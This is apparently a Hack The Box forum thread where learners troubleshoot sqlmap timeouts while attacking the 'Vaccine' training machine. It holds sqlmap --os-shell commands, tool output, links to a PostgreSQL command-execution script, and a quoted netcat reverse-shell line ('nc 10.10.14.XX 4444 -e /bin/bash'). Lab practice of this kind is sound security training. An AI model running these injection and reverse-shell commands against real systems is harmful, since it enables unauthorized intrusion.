Machine name: vaccine stuck on getting SQL code execution shell

Hi forum, a bit stuck here on starting point machine vaccine.

Everything has gone well so far up until the point that I attempt to get code execution with sqlmap.

Running the command below identifies multiple injection points. Good, as expected.
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=73jv7pdmjsv7dsspoqtnlv66ls"

Then running:
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=73jv7pdmjsv7dsspoqtnlv66ls" --os-shell

Causes a connection timeout. I lose my session on the page and have to close the browser and reopen it before I can get back to the login page. The network stays up and I can ping 10.10.10.46 when this happens.

After reopening the browser and getting a new PHP session ID I can rerun the commands above but they drop the connection again. Any ideas?

Comments

  • Also just to add, I did update the command with the new PHP Session ID when this happened...

  • The same is happening to me. Voted to reset lab just in case. And yes, I tried with several PHP Sessions ID cookies.

    The connection always drops at this point:

    ...
    "testing if current user is DBA"

    And it just times out.

  • same exact issue, apparently this isn't uncommon, https://forum.hackthebox.eu/discussion/2905/starting-point-machine-vaccine locked out of both EU and US now

  • Glad I stumbled upon this. I started Vaccine a little bit ago and kept running into connection timeout when issuing sqlmap command with --os-shell. Tried different session IDs and kept running into the same thing.

    Do you just wait it out at this point?

  • Today I came up to the same issue (EU server). Couple of hours later I tried again and it worked. Opening the address in browser also timed out when there was a problem with sqlmap.

  • ok good stuff thanks for confirming that

    @redrom01 said:

    The same is happening to me. Voted to reset lab just in case. And yes, I tried with several PHP Sessions ID cookies.

    The connection always drops at this point:

    ...
    "testing if current user is DBA"

    And it just times out.

    yep I had this too. Voting to reset.

  • I was the fifth reset vote. It's just reset.

  • It's still timing out for me though...

  • Hello,
    Any of you have issues with the version of PostgreSQL? After successfully running the sqlmap, I get the following:

    [13:57:17] [INFO] the back-end DBMS is PostgreSQL
    back-end DBMS: PostgreSQL
    [13:57:17] [INFO] fingerprinting the back-end DBMS operating system
    [13:57:17] [INFO] the back-end DBMS operating system is Linux
    [13:57:18] [INFO] testing if current user is DBA
    [13:57:18] [WARNING] the SQL query provided does not return any output
    [13:57:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [13:57:18] [INFO] retrieved:
    [13:57:18] [WARNING] unexpected HTTP code '302' detected. Will use (extra) validation step in similar cases

    [13:57:19] [INFO] detecting back-end DBMS version from its banner
    [13:57:19] [INFO] resumed: ''

    [13:57:19] [CRITICAL] unsupported feature on versions of PostgreSQL before 8.2

  • What command did you execute? I am about to test this again shortly; I'll update the results after doing so.

  • Nope. I am still getting disconnected after running:

    sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=73jv7pdmjsv7dsspoqtnlv66ls" --os-shell

    sqlmap worked just fine without the --os-shell

  • @NeoCortex2000 Of course you can also do the injection manually. First, it would be a very good exercise, and second, it worked (I just tested it)

  • I got to thinking last night about alternative approaches to getting into this machine but was drawing blanks so thanks for the suggestion!

    Could you provide a little more detail on how one would approach manual injection please?

  • Hi all,

    I'm stuck on the machine as well, mainly because --os-shell in sqlmap times out and seems to invalidate my current session cookie.

    I've gotten to the point now where I can manually navigate the tables and run simple commands via code in the search box (e.g. run "ls" and print the output in the first column).

    Where I'm stuck now is getting shell or a reverse shell to run. Using any variation of "nc" just exits with error code 1 or 2.

    Appreciate any pointers!

    Thx!

  • I'm still stuck on this too... pointers double appreciated!

  • @sechzehn If you can already navigate through the tables you're almost done. Think about what you could find in the tables? A username? Maybe a hashed password? On the machine ssh is activated; with your gained information you could just simply log in via ssh instead of trying to upload a shell ;)

  • I think it's not a problem with the machine itself but rather something caused by users messing around in /etc/postgresql since I had the same problem but was able to complete the machine successfully by exploiting immediately after a reset. Little tip: the section of the walkthrough mentioning vim does not mean you have to edit the file!

  • Hello everyone,

    For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.

    Thank you.

    Hack The Box

  • @0nenine9 said:

    Hello everyone,

    For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.

    Thank you.

    I've been stuck on this for days now because people keep on crashing the server. Literally as soon as a reset vote is done someone almost IMMEDIATELY screws it up again... Very frustrating, especially as this is supposed to be a beginner box.

    Does VIP access include VIP access to the starting servers or only the servers past this point? At this stage I'm willing to just throw money at the issue so I can move on.

  • I've been stuck on this box for over a week. I'm double frustrated as I bought VIP access when I first started but can't use it as this box is in my way.

    I was able to get the --os-shell to work earlier but then it timed out when I attempted to execute the reverse bash shell.

  • Getting through this box is going to need some stubborn determination I think. If anything it's a good thing that it's not working because it's going to force us to think for ourselves and self learn what we don't know. There will be another way in I am sure.

  • I'm not using MSF, I'm trying to use it sparingly as I don't believe MSF is a very good tool for learning. I'm trying a manual exploit but I keep getting timeouts on port 80 which makes that kind of hard.

  • Hello,

    If you want to do it by hand you can follow this link:
    https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

    And if someone prefers, I coded a python script available here:
    https://github.com/florianges/-HTB-Vaccine_sql_injection

    good luck

  • Hello,
    I have the same issue: time out when using the --os-shell option with sqlmap.
    Doing it manually (with florianges's python script) does not seem to solve the issue.

  • Same here with sqlmap and manually or with @florianges script, which is also not working and seems to fail after the last command: "ERROR: program "/tmp/XXXXX/nc 10.10.14.XX 4444 -e /bin/bash" failed DETAIL: command not found"

  • @florianges said:

    Hello,

    If you want to do it by hand you can follow this link:
    https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

    And if someone prefers, I coded a python script available here:
    https://github.com/florianges/-HTB-Vaccine_sql_injection

    good luck

    Thanks for this really appreciate the assistance! I finally managed to root this box!

  • Hello,
    @SIFGU and @OS41380

    Did you open the script and read the comments and meet all of the requirements listed?
    Have you watched the youtube presentation video?

  • @Pyroteq said:

    @0nenine9 said:

    Hello everyone,

    For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.

    Thank you.

    I've been stuck on this for days now because people keep on crashing the server. Literally as soon as a reset vote is done someone almost IMMEDIATELY screws it up again... Very frustrating, especially as this is supposed to be a beginner box.

    Does VIP access include VIP access to the starting servers or only the servers past this point? At this stage I'm willing to just throw money at the issue so I can move on.

    Hiya,

    Yes VIP includes a separate server for starting-point VIP. However, there's no assurance that VIP members will not create instability on the box, as the number of VIP servers for starting-point is smaller than that of main machines.

    Maybe try tackling the machine at a different time of day.

    Thanks!

    Hack The Box

  • I guess the box is still stuck, I voted to reset the lab.

  • I really struggled on this one with the same issues, gave up on sqlmap and used @florianges' Python script. Struggled to understand the nc parameter I was meant to set. Couldn't get it working at first but in the end I literally followed his video step by step, copied the bin file (cp /bin/nc .) into the same location as the web server and then it worked. I was just taking an nc.exe file and copying it into the location and then setting the parameter to nc.exe but that was wrong.
